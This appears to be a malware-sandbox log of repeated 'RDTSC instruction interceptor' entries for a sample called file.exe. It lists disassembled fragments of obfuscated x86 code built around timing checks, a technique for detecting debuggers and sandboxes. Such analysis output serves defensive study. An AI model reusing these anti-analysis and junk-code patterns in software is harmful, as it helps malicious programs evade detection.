              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB78F9 second address: AB7926 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB10CD320FBh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007FB10CD32100h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7926 second address: AB7930 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB10CBE428Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB79AA second address: AB79B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB79B1 second address: AB79B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB804A second address: AB804F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB804F second address: AB807A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB10CBE4291h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB10CBE4291h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8ACC second address: AB8AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8AD2 second address: AB8AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8AD6 second address: AB8B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb edi, 7643F981h 0x0000000f mov esi, dword ptr [ebp+122D17AEh] 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 jmp 00007FB10CD32107h 0x0000001c push edx 0x0000001d jo 00007FB10CD320F6h 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8FDE second address: AB8FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CBE4294h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8FFC second address: AB9006 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB10CD320FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9006 second address: AB906B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or edi, 6C75E400h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FB10CBE4288h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FB10CBE4288h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D1AE4h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jns 00007FB10CBE4288h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB906B second address: AB9071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9071 second address: AB9075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A4A second address: AB9A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A4F second address: AB9A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA33B second address: ABA33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA33F second address: ABA348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB5A3 second address: ABB5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB5A7 second address: ABB5AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB5AD second address: ABB617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FB10CD320F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB10CD32105h 0x00000013 jnl 00007FB10CD320F8h 0x00000019 popad 0x0000001a nop 0x0000001b cmc 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FB10CD320F8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1AE4h], ebx 0x0000003e push 00000000h 0x00000040 sub edi, dword ptr [ebp+122D2A08h] 0x00000046 mov si, F900h 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c pushad 0x0000004d push esi 0x0000004e pop esi 0x0000004f push edx 0x00000050 pop edx 0x00000051 popad 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB617 second address: ABB633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FB10CBE4293h 0x0000000f jmp 00007FB10CBE428Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABCA6F second address: ABCA74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD527 second address: ABD52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD52D second address: ABD54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB10CD320F8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB10CD320FCh 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD54E second address: ABD554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD554 second address: ABD558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE018 second address: ABE046 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CBE4288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB10CBE429Fh 0x00000015 jmp 00007FB10CBE4299h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1437 second address: AC143B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC143B second address: AC1441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5A5C second address: AC5A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB10CD320F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5A6A second address: AC5A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDDCB second address: ABDDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB10CD320F6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FB10CD32100h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDDEC second address: ABDE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB10CBE4298h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FBB second address: AC7FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7FC1 second address: AC8020 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FB10CBE4288h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov di, cx 0x0000002c push 00000000h 0x0000002e jmp 00007FB10CBE4299h 0x00000033 push 00000000h 0x00000035 xor bl, FFFFFFA0h 0x00000038 xchg eax, esi 0x00000039 jp 00007FB10CBE428Eh 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9024 second address: AC902A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC902A second address: AC902E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC902E second address: AC909F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jmp 00007FB10CD32100h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FB10CD320F8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f adc edi, 0C567EFFh 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D2708h] 0x0000003d push 00000000h 0x0000003f js 00007FB10CD320FCh 0x00000045 mov edi, dword ptr [ebp+124497D2h] 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FB10CD32102h 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB3D3 second address: ACB3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1AAC second address: AC1AB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC451 second address: ACC457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61B1 second address: AC61C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FAh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7190 second address: AC7195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7195 second address: AC71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC71A4 second address: AC71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC724F second address: AC7255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE471 second address: ACE486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FB10CBE4286h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE486 second address: ACE4A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE4A0 second address: ACE4EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB10CBE4288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D389Eh], esi 0x00000011 push 00000000h 0x00000013 sbb bx, DB3Ch 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB10CBE4288h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add dword ptr [ebp+122D1BA5h], eax 0x0000003a mov edi, 261DD6B1h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE4EC second address: ACE4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC820F second address: AC8216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0496 second address: AD04EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc edi, 0D23031Ch 0x0000000f push 00000000h 0x00000011 jno 00007FB10CD320FBh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FB10CD320F8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 and bh, FFFFFFF5h 0x00000036 xchg eax, esi 0x00000037 jp 00007FB10CD320FEh 0x0000003d jnp 00007FB10CD320F8h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jg 00007FB10CD320F8h 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD04EE second address: AD04F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB10CBE4286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9259 second address: AC925D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC925D second address: AC931F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB10CBE4297h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB10CBE4288h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D3546h], esi 0x0000002f push dword ptr fs:[00000000h] 0x00000036 pushad 0x00000037 cld 0x00000038 sub dword ptr [ebp+122D2FB1h], ecx 0x0000003e popad 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov ebx, 1BC886A9h 0x0000004b mov eax, dword ptr [ebp+122D0205h] 0x00000051 call 00007FB10CBE4290h 0x00000056 mov bx, 51C1h 0x0000005a pop ebx 0x0000005b push FFFFFFFFh 0x0000005d mov bx, di 0x00000060 call 00007FB10CBE4293h 0x00000065 jmp 00007FB10CBE4298h 0x0000006a pop ebx 0x0000006b nop 0x0000006c pushad 0x0000006d push esi 0x0000006e je 00007FB10CBE4286h 0x00000074 pop esi 0x00000075 push eax 0x00000076 push edx 0x00000077 jc 00007FB10CBE4286h 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1321 second address: AD134D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB10CD320FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FB10CD32107h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA3E2 second address: ACA3F5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4288h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA3F5 second address: ACA4A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, 6D08h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov edi, dword ptr [ebp+122D27E8h] 0x0000001b movsx edi, si 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 or edi, dword ptr [ebp+122D2FE2h] 0x0000002b mov edi, 72637CC0h 0x00000030 mov eax, dword ptr [ebp+122D11E1h] 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FB10CD320F8h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 add bx, F4C6h 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push ebp 0x0000005a call 00007FB10CD320F8h 0x0000005f pop ebp 0x00000060 mov dword ptr [esp+04h], ebp 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc ebp 0x0000006d push ebp 0x0000006e ret 0x0000006f pop ebp 0x00000070 ret 0x00000071 jmp 00007FB10CD320FFh 0x00000076 stc 0x00000077 jng 00007FB10CD320F9h 0x0000007d push edx 0x0000007e stc 0x0000007f pop edi 0x00000080 nop 0x00000081 pushad 0x00000082 push eax 0x00000083 push edx 0x00000084 jne 00007FB10CD320F6h 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA4A3 second address: ACA4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FB10CBE4286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2340 second address: AD234C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD234C second address: AD2352 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2352 second address: AD23A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+124554FCh], esi 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+1244E2FBh], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FB10CD320F8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 pushad 0x00000035 or eax, dword ptr [ebp+122D2960h] 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23A8 second address: AD23BA instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23BA second address: AD23C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9D8D second address: AD9DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007FB10CBE4297h 0x0000000b pop edx 0x0000000c jmp 00007FB10CBE4293h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9EEC second address: AD9EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 js 00007FB10CD320F6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9EFB second address: AD9F0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB10CBE428Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9F0D second address: AD9F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007FB10CD320F6h 0x00000014 jmp 00007FB10CD32105h 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007FB10CD320FAh 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA0A0 second address: ADA0BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FB10CBE4292h 0x00000012 jp 00007FB10CBE4286h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF0E8 second address: ADF117 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FB10CD320FAh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB10CD32107h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF1FB second address: ADF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF1FF second address: ADF210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF210 second address: ADF21A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB10CBE4286h 0x0000000a rdtsc
